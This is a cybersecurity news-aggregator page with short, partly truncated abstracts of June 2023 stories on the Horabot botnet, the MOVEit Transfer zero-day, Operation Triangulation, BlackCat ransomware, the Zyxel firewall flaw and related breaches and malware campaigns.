Abstract Spanish-speaking users in Latin America have been at the receiving end of a new botnet malware dubbed Horabot since at least November 2020. "Horabot enables the threat actor to control the victim's Outlook mailbox, exfiltrate contacts' email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim's mailbox," Cisco Talos researcher Chetan Raghuprasad said. The botnet program also delivers a Windows-based financial trojan and a spam tool to harvest online banking credentials as well as compromise Gmail, Outlook, and Yahoo! webmail accounts to blast spam emails. The cybersecurity firm said a majority of the infections are located in Mexico, with limited victims identified in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama. The threat actor behind the campaign is believed to be in Brazil. Targeted users of the ongoing campaign primarily span accounting, construction and engineering, wholesale distributio

The Hacker News

June 2, 2023 – Government

CISA adds Progress MOVEit Transfer zero-day to its Known Exploited Vulnerabilities catalog Full Text

Abstract US CISA added an actively exploited Progress MOVEit Transfer zero-day vulnerability to its Known Exploited Vulnerabilities catalog. The US Cybersecurity and Infrastructure Security Agency (CISA) added a Progress MOVEit Transfer SQL injection vulnerability,...

Security Affairs

June 2, 2023 – Breach

Iranian dissidents’ claim of presidential hack likely legitimate, experts say Full Text

Abstract A trove of documents, images, and videos from the offices of Iranian President Ebrahim Raisi posted online Monday appear to be authentic, cybersecurity experts familiar with the matter told CyberScoop on Wednesday.

Cyware

June 02, 2023 – Education

The Importance of Managing Your Data Security Posture Full Text

Abstract Data security is reinventing itself. As new data security posture management solutions come to market, organizations are increasingly recognizing the opportunity to provide evidence-based security that proves how their data is being protected. But what exactly is data security posture, and how do you manage it? Data security posture management (DSPM) became mainstream following the publication of Gartner® Cool Vendors™ in Data Security—Secure and Accelerate Advanced Use Cases. In that report, Gartner seems to have kicked off the popular use of the data security posture management term and massive investment in this space by every VC. Since that report, Gartner has identified at least 16 DSPM vendors, including Symmetry Systems. What is Data Security Posture? There certainly is a lot being marketed and published about data security posture management solutions themselves, but we first wanted to dig into what data security posture is. Symmetry Systems defines data security pos

The Hacker News

June 2, 2023 – Botnet

New botnet Horabot targets Latin America Full Text

Abstract A new botnet malware dubbed Horabot has been targeting Spanish-speaking users in Latin America since at least November 2020. Cisco Talos researchers observed a previously unidentified botnet, dubbed Horabot, being deployed against Spanish-speaking...

Security Affairs

June 2, 2023 – Breach

California-based Workforce Platform Prosperix Leaks Drivers Licenses and Medical Records of Job Seekers Full Text

Abstract The misconfiguration led to the exposure of approximately 250,000 files. 42,000 of them contained the sensitive data of job seekers, namely: full names, dates of birth, occupation history, home addresses, phone numbers, and email addresses.

Cyware

June 02, 2023 – Hacker

Camaro Dragon Strikes with New TinyNote Backdoor for Intelligence Gathering Full Text

Abstract The Chinese nation-state group known as Camaro Dragon has been linked to yet another backdoor that's designed to meet its intelligence-gathering goals. Israeli cybersecurity firm Check Point, which dubbed the Go-based malware TinyNote, said it functions as a first-stage payload capable of "basic machine enumeration and command execution via PowerShell or Goroutines." What the malware lacks in terms of sophistication, it makes up for when it comes to establishing redundant methods to retain access to the compromised host by means of multiple persistency tasks and varied methods to communicate with different servers. Camaro Dragon overlaps with a threat actor widely tracked as Mustang Panda, a state-sponsored group from China that is known to be active since at least 2012. The adversarial collective was recently in the spotlight for a custom bespoke firmware implant called Horse Shell that co-opts TP-Link routers into a mesh network capable of transmitting co

The Hacker News

June 2, 2023 – Breach

Point32Health ransomware attack exposed info of 2.5M people Full Text

Abstract After the recent ransomware attack, Point32Health disclosed a data breach that impacted 2.5 million Harvard Pilgrim Health Care subscribers. In April, the non-profit health insurer Point32Health took systems offline in response to a ransomware attack...

Security Affairs

June 2, 2023 – Government

Federal vision to streamline cyber incident reporting expected this summer Full Text

Abstract The Cyber Incident Reporting Council will issue a report to Congress "in the next month or two" with recommendations on ways to achieve harmony across a complex network of federal cyber mandates.

Cyware

June 2, 2023 – Vulnerabilities

MOVEit Transfer software zero-day actively exploited in the wild Full Text

Abstract Threat actors are actively exploiting a zero-day vulnerability in Progress Software’s MOVEit Transfer file transfer product to steal data from organizations. The flaw is being exploited in the wild to steal...

Security Affairs

June 2, 2023 – Attack

New Horabot Campaign Targets Spanish-Speaking Users in the Americas Full Text

Abstract Horabot enables the threat actor to control the victim’s Outlook mailbox, exfiltrate contacts’ email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim’s mailbox.

Cyware

June 2, 2023 – Government

Russia’s FSB blames the US intelligence for Operation Triangulation Full Text

Abstract Russia’s Federal Security Service (FSB) intelligence agency said that the recent attacks against iPhones with a zero-click iOS exploit as part of Operation Triangulation were carried out by US intelligence. Researchers from the Russian firm Kaspersky have...

Security Affairs

June 2, 2023 – Breach

Discord Admins Hacked by Malicious Bookmarks – Krebs on Security Full Text

Abstract A number of Discord communities focused on cryptocurrency have been hacked this past month after their administrators were tricked into running malicious JavaScript code disguised as a Web browser bookmark.

Cyware

June 02, 2023 – APT

North Korea’s Kimsuky Group Mimics Key Figures in Targeted Cyber Attacks Full Text

Abstract U.S. and South Korean intelligence agencies have issued a new alert warning of North Korean cyber actors' use of social engineering tactics to strike think tanks, academia, and news media sectors. The "sustained information gathering efforts" have been attributed to a state-sponsored cluster dubbed Kimsuky, which is also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima. "North Korea relies heavily on intelligence gained from these spear-phishing campaigns," the agencies said. "Successful compromises of the targeted individuals enable Kimsuky actors to craft more credible and effective spear-phishing emails that can be leveraged against sensitive, high-value targets." Kimsuky refers to an ancillary element within North Korea's Reconnaissance General Bureau (RGB) and is known to collect tactical intelligence on geopolitical events and negotiations affecting the regi

The Hacker News

June 02, 2023 – Vulnerabilities

MOVEit Transfer Under Attack: Zero-Day Vulnerability Actively Being Exploited Full Text

Abstract A critical flaw in Progress Software's MOVEit Transfer managed file transfer application has come under widespread exploitation in the wild to take over vulnerable systems. The shortcoming, which is yet to be assigned a CVE identifier, relates to a severe SQL injection vulnerability that could lead to escalated privileges and potential unauthorized access to the environment. "An SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database," the company said. "Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database in addition to executing SQL statements that alter or delete database elements." Patches for the bug have been made available by the Massachusetts-based company, which also owns Telerik, in t

The Hacker News

June 01, 2023 – Malware

Evasive QBot Malware Leverages Short-lived Residential IPs for Dynamic Attacks Full Text

Abstract An analysis of the "evasive and tenacious" malware known as QBot has revealed that 25% of its command-and-control (C2) servers are active for merely a single day. What's more, 50% of the servers don't remain active for more than a week, indicating the use of an adaptable and dynamic C2 infrastructure, Lumen Black Lotus Labs said in a report shared with The Hacker News. "This botnet has adapted techniques to conceal its infrastructure in residential IP space and infected web servers, as opposed to hiding in a network of hosted virtual private servers (VPSs)," security researchers Chris Formosa and Steve Rudd said. QBot, also called QakBot and Pinkslipbot, is a persistent and potent threat that started off as a banking trojan before evolving into a downloader for other payloads, including ransomware. Its origins go back as far as 2007. The malware arrives on victims' devices via spear-phishing emails, which either directly incorporate lure files o

The Hacker News

June 1, 2023 – Policy and Law

Two Visions of Digital Sovereignty Full Text

Abstract EU policymakers may soon finalize cybersecurity standards that could render the new Trans-Atlantic Data Privacy Framework irrelevant.

Lawfare

June 1, 2023 – APT

Operation Triangulation: previously undetected malware targets iOS devices Full Text

Abstract A previously undocumented APT group targets iOS devices with zero-click exploits as part of a long-running campaign dubbed Operation Triangulation. Researchers from the Russian firm Kaspersky have uncovered a previously unknown APT group that is targeting...

Security Affairs

June 01, 2023 – Malware

New Zero-Click Hack Targets iOS Users with Stealthy Root-Privilege Malware Full Text

Abstract A previously unknown advanced persistent threat (APT) is targeting iOS devices as part of a sophisticated and long-running mobile campaign dubbed Operation Triangulation that began in 2019. "The targets are infected using zero-click exploits via the iMessage platform, and the malware runs with root privileges, gaining complete control over the device and user data," Kaspersky said. The Russian cybersecurity company said it discovered traces of compromise after creating offline backups of the targeted devices. The attack chain begins with the iOS device receiving a message via iMessage that contains an attachment bearing the exploit. The exploit is said to be zero-click, meaning the receipt of the message triggers the vulnerability without requiring any user interaction in order to achieve code execution. It's also configured to retrieve additional payloads for privilege escalation and drop a final stage malware from a remote server that Kaspersky described as

The Hacker News

June 1, 2023 – Breach

California-based workforce platform Prosperix leaks drivers licenses and medical records Full Text

Abstract Prosperix leaked nearly 250,000 files. The breach exposed job seekers’ sensitive data, including home addresses and phone numbers. Prosperix, formerly Crowdstaffing, calls itself a “workforce innovation” company that develops software solutions...

Security Affairs

June 01, 2023 – Criminals

Unmasking XE Group: Experts Reveal Identity of Suspected Cybercrime Kingpin Full Text

Abstract Cybersecurity researchers have unmasked the identity of one of the individuals who is believed to be associated with the e-crime actor known as XE Group. According to Menlo Security, which pieced together the information from different online sources, "Nguyen Huu Tai, who also goes by the names Joe Nguyen and Thanh Nguyen, has the strongest likelihood of being involved with the XE Group." XE Group (aka XeThanh), previously documented by Malwarebytes and Volexity, has a history of carrying out cyber criminal activities since at least 2013. It's suspected to be a threat actor of Vietnamese origin. Some of the entities targeted by the threat actor span government agencies, construction organizations, and healthcare sectors. It's known to compromise internet-exposed servers with known exploits and monetize the intrusions by installing password theft or credit card skimming code for online services. "As far back as 2014, the threat actor was seen crea

The Hacker News

June 1, 2023 – Privacy

Apps with over 420 Million downloads from Google Play unveil the discovery of SpinOk spyware Full Text

Abstract Researchers discovered spyware, dubbed SpinOk, hidden in 101 Android apps with over 400 million downloads in Google Play. The malicious module is distributed as a marketing SDK that developers behind the apps embedded in their applications and games,...

Security Affairs

June 01, 2023 – Malware

Malicious PyPI Packages Using Compiled Python Code to Bypass Detection Full Text

Abstract Researchers have discovered a novel attack on the Python Package Index (PyPI) repository that employs compiled Python code to sidestep detection by application security tools. "It may be the first supply chain attack to take advantage of the fact that Python bytecode (PYC) files can be directly executed," ReversingLabs analyst Karlo Zanki said in a report shared with The Hacker News. The package in question is fshec2, which was removed from the package registry on April 17, 2023, following responsible disclosure on the same day. PYC files are compiled bytecode files that are generated by the Python interpreter when a Python program is executed. "When a module is imported for the first time (or when the source file has changed since the current compiled file was created) a .pyc file containing the compiled code should be created in a __pycache__ subdirectory of the directory containing the .py file," explains the Python documentation. The package, per th

The Hacker News

June 1, 2023 – Attack

BlackCat claims the hack of the Casepoint legal technology platform used by US agencies Full Text

Abstract The BlackCat ransomware gang claims to have hacked the Casepoint legal technology platform used by US agencies, including the SEC and FBI. The cybersecurity researcher Dominic Alvieri first noticed that the BlackCat ransomware gang added the company Casepoint...

Security Affairs

June 01, 2023 – Solution

How Wazuh Improves IT Hygiene for Cyber Security Resilience Full Text

Abstract IT hygiene is a security best practice that ensures that digital assets in an organization's environment are secure and running properly. Good IT hygiene includes vulnerability management, security configuration assessments, maintaining asset and system inventories, and comprehensive visibility into the activities occurring in an environment. As technology advances and the tools used by cybercriminals and cybersecurity professionals evolve, the strategies used to carry out cyber attacks differ based on their complexity and uniqueness. Threat actors continuously target organizations practicing poor IT hygiene to exploit known security weaknesses and human error. Security administrators can defend against cyberattacks by implementing good IT hygiene practices like whitelisting programs, keeping systems up to date, and more. Gaining complete visibility into the IT assets is fundamental to developing an effective security strategy. The emergence of shadow IT, like rogue assets, s

The Hacker News

June 1, 2023 – Botnet

Widespread exploitation by botnet operators of Zyxel firewall flaw Full Text

Abstract Threat actors are actively exploiting a command injection flaw, tracked as CVE-2023-28771, in Zyxel firewalls to install malware. Threat actors are actively attempting to exploit a command injection vulnerability, tracked as CVE-2023-28771, that impacts...

Security Affairs

June 01, 2023 – Ransomware

Improved BlackCat Ransomware Strikes with Lightning Speed and Stealthy Tactics Full Text

Abstract The threat actors behind BlackCat ransomware have come up with an improved variant that prioritizes speed and stealth in an attempt to bypass security guardrails and achieve their goals. The new version, dubbed Sphynx and announced in February 2023, packs a "number of updated capabilities that strengthen the group's efforts to evade detection," IBM Security X-Force said in a new analysis. The "product" update was first highlighted by vx-underground in April 2023. Trend Micro, last month, detailed a Linux version of Sphynx that's "focused primarily on its encryption routine." BlackCat, also called ALPHV and Noberus, is the first Rust-language-based ransomware strain spotted in the wild. Active since November 2021, it has emerged as a formidable ransomware actor, victimizing more than 350 targets as of May 2023. The group, like other ransomware-as-a-service (RaaS) offerings, is known to operate a double extortion scheme, deploying c

The Hacker News

June 01, 2023 – Hacker

N. Korean ScarCruft Hackers Exploit LNK Files to Spread RokRAT Full Text

Abstract Cybersecurity researchers have offered a closer look at the RokRAT remote access trojan that's employed by the North Korean state-sponsored actor known as ScarCruft. "RokRAT is a sophisticated remote access trojan (RAT) that has been observed as a critical component within the attack chain, enabling the threat actors to gain unauthorized access, exfiltrate sensitive information, and potentially maintain persistent control over compromised systems," ThreatMon said. ScarCruft, active since at least 2012, is a cyber espionage group that operates on behalf of the North Korean government, exclusively focusing on targets in its southern counterpart. The group is believed to be a subordinate element within North Korea's Ministry of State Security (MSS). Attack chains mounted by the group have leaned heavily on social engineering to spear-phish victims and deliver payloads onto target networks. This includes exploiting vulnerabilities in Hancom's Hangul Word

The Hacker News

June 01, 2023 – Botnet

Active Mirai Botnet Variant Exploiting Zyxel Devices for DDoS Attacks Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched critical security flaw in Zyxel gear to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2023-28771 (CVSS score: 9.8), the issue relates to a command injection flaw impacting different firewall models that could enable an unauthenticated attacker to execute arbitrary code by sending a specially crafted packet to the device. Zyxel addressed the security defect as part of updates released on April 25, 2023. The list of impacted devices is below: ATP (versions ZLD V4.60 to V5.35, patched in ZLD V5.36); USG FLEX (versions ZLD V4.60 to V5.35, patched in ZLD V5.36); VPN (versions ZLD V4.60 to V5.35, patched in ZLD V5.36); and ZyWALL/USG (versions ZLD V4.60 to V4.73, patched in ZLD V4.73 Patch 1). The Shadowserver Foundation, in a recent tweet, said the flaw is "being actively exploited to build a Mirai-like botnet" since M

The Hacker News

June 01, 2023 – Vulnerabilities

Urgent WordPress Update Fixes Critical Flaw in Jetpack Plugin on Millions of Sites Full Text

Abstract WordPress has issued an automatic update to address a critical flaw in the Jetpack plugin that's installed on over five million sites. The vulnerability, which was unearthed during an internal security audit, resides in an API present in the plugin since version 2.0, which was released in November 2012. "This vulnerability could be used by authors on a site to manipulate any files in the WordPress installation," Jetpack said in an advisory. 102 new versions of Jetpack have been released to remediate the bug. While there is no evidence the issue has been exploited in the wild, it's not uncommon for flaws in popular WordPress plugins to be leveraged by threat actors looking to take over the sites for malicious ends. This is not the first time severe security weaknesses in Jetpack have prompted WordPress to force install the patches. In November 2019, Jetpack released version 7.9.1 to fix a defect in the way the plugin handled embed code that had existed since July 2017 (ve

The Hacker News
